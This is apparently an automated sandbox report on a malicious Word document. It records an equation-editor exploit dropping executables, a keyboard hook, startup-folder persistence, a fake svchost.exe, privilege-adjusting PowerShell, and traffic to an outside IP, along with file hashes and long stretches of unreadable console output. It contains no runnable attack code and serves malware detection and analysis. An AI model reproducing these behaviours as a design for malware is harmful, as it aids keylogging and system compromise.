Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49177 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\CTF loader_es.exe

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_01B7B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_01B7B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_007DB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_007DB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0061B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0061B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_025DB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_025DB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_01E0B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_01E0B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0253B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0253B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_003FB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_003FB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_006FB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_006FB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D0B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D0B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_01DFB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_01DFB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_01D8B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_01D8B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0052B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0052B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_003CB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_003CB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_01D0B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_01D0B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_01F4B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_01F4B2CC NtQuerySystemInformation,

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

File created: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 4_2_00B52050
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 4_2_00280C80
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 4_2_00280490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Code function: 13_2_00822050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Code function: 13_2_00220C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Code function: 13_2_00220490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AD33FA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Code function: 20_2_001E0490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Code function: 20_2_001E0C80
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_00B52050
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_002E53C8
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_002E5FE0
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_002E5710
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003B0748
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003B59C0
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003DCCB9
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D2E90
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D5170
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D6B58
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D97C0
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D8428
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D5810
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003DD878
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D22A8
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003DD698
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Code function: 21_2_003D9CE3
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Code function: 29_2_00F62050
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Code function: 29_2_00210490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Code function: 39_2_00822050

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\CTF loader_es.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B

Source: CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winDOC@43/29@17/2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_01B7ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_01B7ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_007DACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_007DACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0061ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0061ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_025DACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_025DACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_01E0ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_01E0ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0253ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0253ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_003FACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_003FACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_006FACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_006FACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D0ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D0ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_01DFACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_01DFACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_01D8ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_01D8ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0052ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_0052ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_003CACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_003CACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_01D0ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_01D0ACB7 AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_01F4ACEE AdjustTokenPrivileges,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_01F4ACB7 AdjustTokenPrivileges,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$5421-allignright.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBCF8.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....P.......l................q......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....P.......l................q......................0.......#.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....P.......l................r......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....P.......l...............$r......................0......./.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....P.......l...............Lr......................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....P.......l...............tr......................0.......;.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........r......................0.......G.......x.x.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....P.......l................r......................0.......G.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....P.......l................r......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....P.......l................r......................0.......S.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.........$s......................0......._.......x.x..... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....P.......l...............?s......................0......._.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....P.......l...............gs......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....P.......l................s......................0.......k.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.x.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....P.......l................s......................0.......w.......x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....P.......l................s......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....P.......l................t......................0...............x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....P.......l...............Et......................0...............x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....P.......l...............`t......................0...............x.x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P..............................x......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P..............................y......................0.......#.........x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............................ky......................0......./.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P..............................y......................0......./.........x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P..............................y......................0.......;...............\|.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P..............................y......................0.......;.........x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........y......................0.......G.........x.....".......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P..............................z......................0.......G.........x.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................Bz......................0.......S.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P..............................z......................0.......S.........x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P..............................z......................0......._.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P..............................z......................0......._.........x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P..............................{......................0.......k.......................(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............................'{......................0.......k.........x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........x.....2.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............................p{......................0.......w.........x.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................{......................0.......................l.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................{......................0.................x.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P..............................{......................0.................x.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................{......................0.................x.............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................?.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................c.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.............................@.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................k.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............................U.......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............8.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............8...............1.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............8...............e.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............8.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............8.......................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............8.......................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.............8.......................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............8...............=.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............8...............Z.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.................................0......._............... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............8.......................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............8...............O.......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............8...............z.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............8.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............8.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............8.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....X...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....X...............................................0.......#.......X.w.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....X...............................................0......./.......................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....X...............................................0......./.......X.w.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....X.......................1.......................0.......;...............\|.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....X.......................L.......................0.......;.......X.w.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......v.......................0.......G.......X.w.....".......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....X...............................................0.......G.......X.w.............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....X...............................................0.......S.......................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....X...............................................0.......S.......X.w.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....X...............................................0......._...............~.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....X.......................1.......................0......._.......X.w.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....X.......................Z.......................0.......k.......................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....X.......................v.......................0.......k.......X.w.............................
